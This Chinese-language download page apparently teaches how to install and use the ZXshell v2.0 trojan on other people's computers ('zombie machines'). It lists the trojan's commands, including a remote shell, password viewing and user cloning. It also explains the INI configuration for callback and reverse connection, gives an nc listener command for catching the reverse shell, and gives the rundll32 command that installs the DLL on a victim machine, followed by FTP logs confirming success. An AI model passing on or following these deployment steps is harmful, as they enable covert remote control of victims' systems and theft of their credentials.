版权所有: 软件版本:动画 文件大小:5.69MB 操作系统:win9x/NT/2000/XP 下载说明: ZXshell安装使用教学 ZXshell v2.0是一款精致的木马,只有12K大小,拥有小榕BITS的高隐蔽性,支持正向和反向连接方式;具有类似Winshell的操作及更多实用的功能;能像网络神偷一样实现服务端上线通知,查看在线服务端IP。其主要功能如下: 命令列表 注释 ? 显示此消息 info 系统版本信息 shell 获得系统命令提示符 download Http下载 list 列出所有进程 kill 结束指定进程 termsvc 设置终端服务 fpass 查看已登录用户的密码 clone 克隆/删除任意用户 whoami 显示本服务的进程PID remove 禁用本服务 exit 退出但不关闭服务端 quit 退出并关闭服务端 reboot 重新启动计算机 shutdown 关闭计算机 ZXshell的使用过程相对简单,只要上面的命令记住就OK了。启动ZXshell,输入密码后,显示成功。注意这是不回显的,我们输入“?”是看不到的。我们输入info,回显如下: CMD>系统版本:Windows 2000 Advanced Server 语言:Chinese(PRC) 驱动程序版本:12/09/1999,5.00.2195.1 命令成功完成。 假如要删除它,只要输入remove 就可以了。其它的功能也很简单,大家自己动手操作一下就知道了。 假如你的机器不是FTP服务器或WWW服务器,在使用ZXshell时记得将MyIP改为你的IP,最好是固定的,能被公网解释到,要不然它可能不会太听话的哟。 安装 首先配置客户端,如动画演示,要填上可供下载的INI文件地址,我们用WWW或FTP都可以实现的。 在其他计算机安装了配置好的服务端后,必须将zxsvc.ini设置好后上传到配制服务端时设定的网址(或FTP),下面介绍如何设置zxsvc.ini,该文件原始内容如下(只能修“=”后面的内容): [zxconfig] MyIP=127.0.0.1 告诉服务端将UDP消息发给这个IP地址,也就是填你自己的IP,我准备只在肉机上操作 Port=2004 告诉服务端打开这个端口等待连接 Password=123456 客户端连接时需要的密码,这个可以设复杂一点 Banner=Password: 密码提示 BackConnect=0 “0”表示不采用反向连接,也就是打开端口等待连接,“1”表示通知服务端反向连接。 ServerID=123 当BackConnect=1时,这里填的数据就是要通知的服务端的ServerID号,该号在接收到的UDP消息中有提供 LocalPort=8080 当BackConnect=1时,必须配合nc.exe使用,在本地打开端口,如nc -l -p 8080,若想再次接收反弹Shell必须使用另一个LocalPort! 设置好后先运行zxrecv.exe(接受服务端的信息),然后将zxsvc.ini上传到你的主页空间(这里是FTP空间),位置必须对应在配制服务端时设定的网址,当服务端读取到该文件后先给MyIP发个信息(主机名、IP地址、ServerID号),再判断BackConnect的值,“=0”则打开Port等待连接,“=1”则判断ServerID是否与自己一样,如果是则向MyIP反弹Shell! 我们要保证INI文件能被下载到,就是FTP能正常工作。把生成的DLL文件传到另一台肉机(要控制的),并运行它,运行命令为“Rundll32 ZXshell.DLL,I”(注意I为大写),我用的是DNTU,在这儿回车就可以了,这样就安装成功了。接着我们试着连接肉机的2004端口,稍等一下,最后就可以看到熟悉的成功界面了,为Password:123456。现在我们再看一下FTP的记录,是否有读到INI文件: [2004-9-29 17:18:22] [352] Incoming connection from 218.19.130.210:1407. [2004-9-29 17:18:22] [188] Incoming connection from 218.19.130.210:1408. [2004-9-29 17:18:22] [352] Login for user "test" refused due to connection limit. [2004-9-29 17:18:22] [352] Connection closed. [2004-9-29 17:18:22] [188] Login for user "test" refused due to connection limit. [2004-9-29 17:18:22] [188] Connection closed. [2004-9-29 17:18:38] [220] User "test" began downloading "/ok.ini". [2004-9-29 17:18:38] [220] Download completed. [2004-9-29 17:18:38] [224] User "test" began downloading "/ok.ini". [2004-9-29 17:18:38] [224] Download completed. 有的,成功下载,这就表明我们的木马可以正常工作了。
立即下载
关于我们 / 合作推广 / 给我留言 / 版权举报 / 意见建议 / 广告投放 / 友情链接 Copyright ©2001-2006 Lihuasoft.net webmaster(at)lihuasoft.net 网站编程QQ群 京ICP备05001064号 页面生成时间:0.00204